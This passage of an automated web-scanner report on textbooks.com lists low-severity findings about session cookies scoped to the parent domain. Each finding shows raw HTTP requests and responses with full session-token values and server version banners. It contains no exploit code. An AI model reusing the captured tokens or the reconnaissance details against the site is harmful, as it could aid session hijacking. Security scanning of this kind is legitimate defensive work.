meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=CdH9LFYD8Vfry2EqmBGV%2B1LHC2Md9X2lIMPio%2FZHBDjj4lVYpYgFIgBJ2fDWTkgw9xwkv7JTa3ODRzvHY5dDJ187ZpfbF2xzOcgnuFAkv6DjdOCYMBmRszo%2Bt3tHlCCgViu%2FVMvYjSfG5bArg%2BaI7JjQroKb4QrzZHjip%2FKl7yEj%2FlCOWSL3e8A3nj4v1x7I4E5wRb7OKIqQmRWFocfauhZg6DBqOHAqfSXI6iVzS%2FvAm7%2FozZa2KLjjKqrhvw0JtsOpvSwUWDDrNfrSe8dZZWgDFYm0rlXdG8AXSKsFKKYE66tVpC8kgBXpRqIFjjMIirpNo%2F68Lhjtk5AxY1yIDT%2BOCOpryeVSfwXDLbJs5waIwRrOxK1VH7ISOVueu%2BbpS1gJw5bYRsAWLJIoQgjgYkNWc5wBxC7ykmjMyhtdgG35qEGcVeQTB01Q9nLqyjJyP83oPXAeGgupg0K7BIa7omAQPLXmG1OCeCYhxU5Uo8VgAaNNVjqNcA5RhO5xq5O%2FTl7vKdNE4zNaC5%2FN8fVAmfHjCjyKMvkFGW3sRHJ40p4AfJxSZGaXn92bx2VgohnBZfsUn0lSJ%2FDVp6nYl608o6In5ET35pQZFXiPKm%2F1ZvVHOilc%2B7ORIa0oZjLjqI3sBUiQ%2FbWqZj83T527z%2Fl3OcnyHIrm3k2sJ7G%2FpAoUurp6oUCFlofRkxk8ytG61j6%2BduJJrOURZcTpBLK9XPVgU5yTnkwSKBO%2BnwfvOS2XKzs6T1kPMUfZmAu%2B65HJ2QI8w91XdFq7ERP2wjH38FionnVC0M%2FuteGwFVv0nTjbFkLy3zabxNsPrqcsYB9lJGTcq2WZJOvxCve7uuPaz1RIveOtFQmAzvpHeHGJcZZO47MDIEZu4o57uEieUQVpKettpmGInz8G0LLzO%2BM%2B8QJyL3zCVcDNIQVpOv0w0LTlwd7NzCbABOGch%2BIW2IReJaYpiZoOIj%2FBSQRZvsrjShwWVO4GPGeQg5VCAeW0mVBSzgkLXXYgorH3gmvaymsuyhKQq6sPRpZ7%2FzPt9cIREY66cvfSZNH6BnUXyEIVD9p12u%2Fgz4DyUbMizmrv6D8LUH2v%2Fty%2FkZ1UT8BwxQGlXF53%2FVZrNbyDdEZpQU%2F%2BcoHql3jDCWLWEKwFn%2BE%2FPtr%2Fj3oEpsZj1IQkiEJ5PPDJM67zojrJI4kadTQEGZCfYYolV8MRO5s4C7o7fZAPmNw039hH9PNVR2wuy%2Bw0HeOfUshbA%2B49mILqIPxYgyPb1TlsjpKk9kOZlqpLBP3vwGM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=OfgoPtZ5xO56sECzXho%3D; expires=Mon, 26-Dec-2011 13:52:34 GMT; path=/; domain=.textbooks.com
Content-Length: 110012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/R/Reference-Materials.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/R/Reference-Materials.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=lWW7095Hg1ig8uQW8L4tHoLuc%2FIHIv69fbY%2F7AeSB39DPMmHu7wprb0Q0HEuveRv%2FF6JHL43wqoIKy9W9TrEcCjN66qOeeK7DMBiEcghYgg43a1eRWpySFlrfs0nzwjAeELsCPucykDEds%2FaasQo%2BMz913BNOMqADlkMonkYW9MBONQh0NN7%2Bgn00j1ZrzgQwqf0OUeb9BDYW21oVsj%2FdJdR0akhOZK%2F51wY6BfRV5EgGTM65n%2BFRNRya%2BiLb7JahucPeAbl9x%2BmhOOnO9%2B3vXyI6sQBNk%2BTY5acFyexwVXFLhMPsgJOHhbbt5Xu5IdSMPJ5mwbFVdFqPn0G23%2FsgxWXSWdGDnwAjpfPCi7szYoWTvS4LGvp0bPyoGV64TqdRQST3gkjLXC%2BbjahLgjKOqTj%2FbzQT73DSfMceGTBMfbq%2FkPKTmPT%2FGtUuHOaMhZnFCbq%2B1myev%2BXhT27fOdn4BM6L%2Fq%2FAOHmmRRCrMvZYIIaKogio7haqhIXuzppk1jI5qJaX1kozxHPq5IWmDhRpQLku0MYJlkkU3BbvxgM9zc1ytri%2BSShq9%2FhTtxdwvxu6fP54Qbb639bOftEwkkZ17oex1B%2BbtT08sH6SDsD1RAWJbMd%2FZhco949cbNtw%2FQDSx1DqDAkQoXh%2BduOs%2BSDVxd%2BRU7UcSMHjn5l9oZNqgudx4QOQStpPUhUB%2BQzChVikzK6JsdK%2Fog4ubjTvS2hMxgCLw25pkiH%2B1XnQzeR59%2FWJX%2BOFhdfEbdfCHehsxmIBAcgQ49heBG%2BGipmvLn7TmbTDe51UHYZtp%2FpPMKf%2By8P26TxRMmcJHiJpCosEzKZpVrFuwfiphEoFflcxAxA3kcAMm8pOOlf1FYYkPSvwRCejf5OPPOdLo5KJ0Cpru9WBOvS8%2Finc%2Bqll%2FnFeyHvvk0rWbc3ijPVV7DAaVu8ebTjdB1nJBgYz6ebzHnYvLfhG0DSmbFSifE5Ec7auE2okDMny0YRaQ%2BWN3TokOyNLEKwxuMkCpS0V3kJhmIMjdidEBg97nDyiD8SeC1jRSMxmi3VZ2KHlEn6Z2yfS%2FK2QEf8d19bM3zDIKDLov320SsOOGFH5KTfGYqYqb2rHg8%2FtVYEOATQx92S736NdiA6MdC2IE5Jiufr6Vp4xzmBa8OMrZl8qPdzXdVUks5bTTqiZiZl9UK0X4aE0JsDz6YYNh1MYd8JYJImlyClsU%2FFSyB8h5q54jI2zcv%2FZ0fTzLxvWyE%2FLW5L3yLANRhETaRLMB7IOL3Gu011Zc3dPr0%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=r9T1CLykg7iNlM9mW4g%3D; expires=Mon, 26-Dec-2011 13:52:47 GMT; path=/; domain=.textbooks.com
Content-Length: 124683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/S/Social-Sciences.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/S/Social-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=xRQX55189n8zA%2FwnIp1C0b%2F9aBYes8fGlayALGU4Y%2FO38uipRddVmnRDHMN4k%2BItUZODbUe8ekOmkjKJiKXhFx1uP%2F9mLKCdMr4rA%2F7hQ%2B%2BzmI9Ov89MnWeZKHmKi0UT%2FEwu368A%2Bh0LAhbUJMD1ZLPSU9cYltYN2hv03GIZ%2BU8Xz7hlQRm4YQ0%2B6wRLn9EUrpd%2FF716MjY2ZCO3%2BUot8DYeFpodOjX%2FKOYYx0t3KsVyAKRubho5BMJh%2Bfyy%2BJXDdRGM%2FyJIX80Ee46YKxd9y4ZxQnorvbw6O%2Fx3jO9KGLjeSewCeNj0rwbQ5RkaseMHh9OMScRKZQOm18NARKFo7%2B6jQy2eX%2FjVaA1JtXFrUjWCJQvcXaNfglwVJmgYzROpgyK1JSAMBffOZOp5%2BPA9dM2V1HbkWc7pr4U5dYc8zXzBVi4GiT4%2BQpuX9q6yaOWWx9GSLClmeMt76kvQ4M3TStY7mXT9Qxr4EtUIj6qWHcuD9060xc%2BMCD3IpEA44dzi%2FasaSBjO5juu1heSznTBD5NvGwg7eNQ%2FGdoyKJQc7sVHAAoMdxqVF6UatbucxEh04tC3j1tgpSOUrNnfuSV%2BJvHk0NXKZd1NQPCKONaZArniF2A3oMN%2BAnzC14T6R%2Fk91cNFcBvKfMOvqoYyRykzFJUhgA8M4rYmxkm981YU7pPy2Ob8kdrg71TWG2yMtt0%2F4ZLDhxSGghzbSRUVX07N121ZGHsXtHXx3dEwsm0jUYQBBHxQyJDsEnrBw55GW80Ts1NkLVgP%2Fz9nevbJ28rFTrs5XegaNssPcaIofSADlpaKYPKxDtdslIBlz1LsBkZ%2B0V0s6KMNBpQloypKpkScwlDGj%2BHUrnAOexucfo%2BJ1O1ztRiJKFDzyfWN5C9Q3YsftQpVqYZ5NCyxOswNcNhzG1QHvm9QCs7lsuhZQq%2F0X3jQeR3jKmWP5xX6E6NNSX%2F17h5Tk%2F5rgyR2GC%2BDBBcJ7jtjd1Ivhre6NrHXV7fj%2B0r514Xc61RwSQV7hDzpo4aE3U0opmnLBXLw2Wsr2NsLihuZdg6GKV614VLtP8hWTIEciJii35QFPM82aSebcStWKxDdVT9jui%2F9HDiwrNRZt%2BC%2F5Vxoeg%2F5jNbhkQ3ybr6ADZw1nuxUCZem%2BlXmqYvrKgNEbngd5EXIf1c8a17ZwvFECJqUxCpbXVfq2yGeGhdPhPrxsZAVkGgO3aSDFZnm4OoiZLZQ4VHpPyAqec2X1vww5h%2FRIzeekFWbnCtNVHopWLG71yEY2nrxMKo%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=fu4pT4XxuU2DnO1wKnI%3D; expires=Mon, 26-Dec-2011 13:52:55 GMT; path=/; domain=.textbooks.com
Content-Length: 149776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=1gyLXHBIfSMKPz%2Fw5IiqSbZ6agOmagd%2B9zhguG5Vt%2BrxTeTjBNSgMTE7jL8Ji9QU4cdawByalwZL9n0brAdnFudnztnjTPBayhZPb8FpYWBkinyNXyQdxVVhl5ADyHN7Njc%2Bi9tOVckiAE%2FXrUokgWoLMgOYdhEafJyJ%2BINyX0WJDiBkhSsaAman7d0oTEWEivU3sWpP5hQbmrdICIewCkt%2F7uPfp8wxtXCmAxB%2BYBEDAaLX5ZHAtj4lasxbloPgb06LFNhEyx1jVTQj%2BUSIDEBNonP9XMNVWzZWwTlf%2BgCtZLYRQ9PFG1B%2BlGJ1m77fMCei8JR89%2Bp2NVJsULWKsIsRVv1f81n3k6LqWDQHLqX51sZ6qVB3By3MhsKrJcOS6wtZAmt7Y5pqbH%2F0v8n942mb4lb934eNLnC4MtRXXyL9XO%2FHaWJ%2F2DeQ4AuEAC2rP9p1AsBnHmNjfUkgt8waYfeUUqUMYPopyN0dTpvblsPc9lBc3Ao3MfzqpMsn2VThteurH9p02FcyYbn8iyxD7tBncAz89FtZ0tHo8DspQb7w%2FxVhbUm5cahrdkSKNNlOO8whuXah9Kg9DvtjUDSDnsGlLAmbe5NLTsnsznKJVZyGqw2KRNaeKXNFqGYN5OO69dPPzDl%2BOoDa678%2BMW2%2BNdVhu%2Fdcje0SDbimNqwdLIVwi%2FvjnvxYfgKF08j9beUaRUYcWPehchsKK11UbkrWdicvDPYqSKDYqJKWC8G3Nr2c11u%2Fl4YlaR00WOldYB0fVgyvQx%2FdFwEvShbLYN%2FWhHBGfZ%2BkQWkFFyqxSV07OtqD4sY%2BBJo4PrfsOcj%2B1XFFCXvnXdwL0nyeCYLHWtMjVQmgFKOquaZlGZGzZoucbjoYjgotpgVGX1HbAkcTGm%2F14VbafyhS3eVWfs5rfLWL4qC6sKq26y%2FgcMDcaVlyYw0SFFuJbxW3QSWciW%2Fc8Cq62edTkCGrq%2FkC20F9yiqEJo5aQ5z1zofKQ1J278fbiNIqV5JrVkUmpa1isbRPwzZl9DqbrqoXFN683FiZF0szTmPFyUWnTXh%2BCZlIjSEoo%2Fgs5UNQScJg7HIYy9Jp3MJAREly8HnXCCPRw8Rpnyl2gp%2FkOl5ebcOf2xNJeXfT6KN0YBalioHGw0BzmqdHy0WZlOmdzpsbn4jPmtrj2TH1htEHHTLzPL6lPAB6vW1VRvrJECH7CHpt715eZZKt8ORsi7L06jU75greL4IaQR850zQeoOi4V0XPnwMk%2FvZnPxOk0w2Z2%2BarOdrS5NY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=RYtl1QdxWBaKvyvtQEw%3D; expires=Mon, 26-Dec-2011 13:52:06 GMT; path=/; domain=.textbooks.com
Content-Length: 155433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/V/Vocational-and-Professional-Education.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/V/Vocational-and-Professional-Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:56 GMT
Connection: close
Connection: Transfer-Encoding
